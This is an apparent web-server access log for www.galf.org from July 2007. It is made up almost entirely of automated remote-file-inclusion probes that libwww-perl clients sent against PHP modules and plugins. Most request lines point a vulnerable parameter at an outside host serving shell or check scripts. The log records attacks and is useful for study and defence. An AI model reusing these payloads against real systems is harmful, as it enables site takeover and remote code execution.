216.86.147.205 - - [08/Jul/2007:20:09:20 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://lott.by/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.86.147.205 - - [08/Jul/2007:20:09:20 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://lott.by/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:09:48 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:09:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [08/Jul/2007:20:10:22 -0700] "GET /logs/index.php?p=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [08/Jul/2007:20:10:23 -0700] "GET /index.php?p=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:10:56 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:10:56 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.103.207 - - [08/Jul/2007:20:12:46 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://lott.by/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.103.207 - - [08/Jul/2007:20:12:47 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://lott.by/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:13:06 -0700] "GET /logs/index.php?x=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:13:07 -0700] "GET /index.php?x=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.244.152.186 - - [08/Jul/2007:20:13:42 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.244.152.186 - - [08/Jul/2007:20:13:42 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:15:39 -0700] "GET /modules/My_eGallery/index.php?basepath=hhttp://thedivaslist.com/.r/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.202.124.115 - - [08/Jul/2007:20:16:10 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.193.103 - - [08/Jul/2007:20:16:40 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://gsblab.net/bot/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.249.127.33 - - [08/Jul/2007:20:18:51 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.202.124.115 - - [08/Jul/2007:20:20:18 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.123.128.28 - - [08/Jul/2007:20:21:24 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.123.128.28 - - [08/Jul/2007:20:21:24 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.86.19 - - [08/Jul/2007:20:21:50 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.252.3.200 - - [08/Jul/2007:20:22:12 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.252.3.200 - - [08/Jul/2007:20:22:12 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.249.127.33 - - [08/Jul/2007:20:28:20 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.86.19 - - [08/Jul/2007:20:28:51 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.86.19 - - [08/Jul/2007:20:28:57 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.169.164.112 - - [08/Jul/2007:20:30:00 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
203.169.164.112 - - [08/Jul/2007:20:30:02 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:20:31:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:20:32:32 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:20:32:33 -0700] "GET /logs/access_070625.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:20:32:46 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:20:32:46 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.225.103 - - [08/Jul/2007:20:34:07 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.labellos.de/components/com_forum/cache/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.225.103 - - [08/Jul/2007:20:34:07 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.labellos.de/components/com_forum/cache/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:20:34:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.73.93 - - [08/Jul/2007:20:34:20 -0700] "GET /logs/access.log HTTP/1.0" 200 32826 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.245.86.19 - - [08/Jul/2007:20:39:03 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:20:39:33 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:20:39:35 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.225.103 - - [08/Jul/2007:20:40:52 -0700] "GET /logs/access.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.labellos.de/components/com_forum/cache/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.202.124.115 - - [08/Jul/2007:20:41:48 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.202.124.115 - - [08/Jul/2007:20:49:14 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.235.184.41 - - [08/Jul/2007:20:55:06 -0700] "GET /logs/index.php?file=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [08/Jul/2007:20:55:06 -0700] "GET /index.php?file=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:20:58:52 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:20:58:55 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:20:59:56 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:21:00:05 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:21:00:06 -0700] "GET /logs/access_070611.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:21:00:18 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.17.147 - - [08/Jul/2007:21:06:28 -0700] "GET /LABIA23portugues/index.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.202.124.115 - - [08/Jul/2007:21:16:49 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.235.5 - - [08/Jul/2007:21:19:40 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/sclipiciul/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.235.5 - - [08/Jul/2007:21:19:40 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/sclipiciul/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.202.124.115 - - [08/Jul/2007:21:21:39 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.85.138.162 - - [08/Jul/2007:21:25:23 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freewebs.com/lamercrew/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:21:28:25 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:21:28:25 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freewebs.com/lamercrew/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:21:29:42 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:21:29:42 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.235.184.41 - - [08/Jul/2007:21:31:31 -0700] "GET /logs/webcalendar/ws/login.php?noSet=0&includedir=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [08/Jul/2007:21:31:31 -0700] "GET /webcalendar/ws/login.php?noSet=0&includedir=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:21:31:52 -0700] "GET /modules/My_eGallery/index.php?basepath=http://freewebs.com/lamercrew/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:21:31:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.18.118 - - [08/Jul/2007:21:33:03 -0700] "GET /cendoc/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
205.234.235.5 - - [08/Jul/2007:21:33:41 -0700] "GET /logs/announcements.php?phpraid_dir=http://www.freewebtown.com/sclipiciul/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.235.5 - - [08/Jul/2007:21:33:41 -0700] "GET /announcements.php?phpraid_dir=http://www.freewebtown.com/sclipiciul/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.202.124.115 - - [08/Jul/2007:21:35:39 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.243.248 - - [08/Jul/2007:21:43:40 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.243.248 - - [08/Jul/2007:21:43:40 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.235.184.41 - - [08/Jul/2007:21:52:51 -0700] "GET /logs/webcalendar/ws/login.php?noSet=0&includedir=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.235.184.41 - - [08/Jul/2007:21:52:52 -0700] "GET /webcalendar/ws/login.php?noSet=0&includedir=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
190.64.209.10 - - [08/Jul/2007:21:52:58 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.galf.org"
190.64.209.10 - - [08/Jul/2007:21:53:09 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:21:57:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://freewebs.com/lamercrew/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:21:57:50 -0700] "GET /modules/My_eGallery/index.php?basepath=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:22:04:55 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://freewebs.com/lamercrew/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.23.232 - - [08/Jul/2007:22:06:09 -0700] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:22:06:57 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:22:06:57 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.137.32.8 - - [08/Jul/2007:22:13:35 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
84.243.254.20 - - [08/Jul/2007:22:17:56 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
84.243.254.20 - - [08/Jul/2007:22:19:04 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
84.243.254.20 - - [08/Jul/2007:22:19:12 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.107.59.70 - - [08/Jul/2007:22:22:35 -0700] "GET /display.php?page=&lang=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.17.204 - - [08/Jul/2007:22:23:19 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:22:23:36 -0700] "GET /logs/access.log/display.php?page=&lang=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.107.59.70 - - [08/Jul/2007:22:24:08 -0700] "GET /logs/display.php?page=&lang=http://sistemas.unilestemg.br/sic/x/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.243.248 - - [08/Jul/2007:22:28:04 -0700] "GET /logs/index.php?go=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.243.248 - - [08/Jul/2007:22:28:04 -0700] "GET /index.php?go=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.63.192.22 - - [08/Jul/2007:22:28:51 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://lott.by/d? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.63.192.22 - - [08/Jul/2007:22:28:51 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://lott.by/d? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.73.181.50 - - [08/Jul/2007:22:30:23 -0700] "GET /logs/access.log%20//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pnp21.co.kr/bbs/data/.xpl/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
205.234.200.194 - - [08/Jul/2007:22:35:36 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rocportint.com/store/images/event/Sia.Selalu.Menenemanimu? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
205.234.200.194 - - [08/Jul/2007:22:36:58 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rocportint.com/store/images/event/Sia.Selalu.Menenemanimu? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
205.234.200.194 - - [08/Jul/2007:22:39:28 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rocportint.com/store/images/event/Sia.Selalu.Menenemanimu? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.243.254.20 - - [08/Jul/2007:22:40:32 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.173.115 - - [08/Jul/2007:22:40:45 -0700] "GET /logs/index2.php?content=http://www.nelsonianexperience.com/delete.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.115 - - [08/Jul/2007:22:40:45 -0700] "GET /index2.php?content=http://www.nelsonianexperience.com/delete.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.200.194 - - [08/Jul/2007:22:41:26 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rocportint.com/store/images/event/Sia.Selalu.Menenemanimu? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.23.172 - - [08/Jul/2007:22:41:43 -0700] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
205.234.200.194 - - [08/Jul/2007:22:41:58 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rocportint.com/store/images/event/Sia.Selalu.Menenemanimu? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:22:43:31 -0700] "GET /index.php?go=http://freewebs.com/lamercrew/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.137.32.8 - - [08/Jul/2007:22:44:38 -0700] "GET /logs//modules/admin/vw_usr_roles.php?baseDir=http://terroristirc.by.ru/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.137.32.8 - - [08/Jul/2007:22:44:38 -0700] "GET //modules/admin/vw_usr_roles.php?baseDir=http://terroristirc.by.ru/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.200.194 - - [08/Jul/2007:22:45:48 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://2msdance.com/images/banners/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.200.194 - - [08/Jul/2007:22:45:48 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://2msdance.com/images/banners/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.68.221 - - [08/Jul/2007:22:47:55 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.61.91.106 - - [08/Jul/2007:22:51:45 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:22:51:47 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.235.184.41 - - [08/Jul/2007:22:53:45 -0700] "GET /logs/webcalendar/ws/login.php?noSet=0&includedir=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [08/Jul/2007:22:53:46 -0700] "GET /webcalendar/ws/login.php?noSet=0&includedir=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.243.254.20 - - [08/Jul/2007:22:57:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://freewebs.com/lamercrew/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
84.243.254.20 - - [08/Jul/2007:22:59:30 -0700] "GET /index.php?go=http://freewebs.com/lamercrew/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.6.18.44 - - [08/Jul/2007:23:04:41 -0700] "GET /logs/access.log HTTP/1.0" 200 49023 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.36.230.130 - - [08/Jul/2007:23:08:32 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.230.130 - - [08/Jul/2007:23:08:32 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.144.201.247 - - [08/Jul/2007:23:11:00 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.rushingrentners.com/extern/neue/img/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
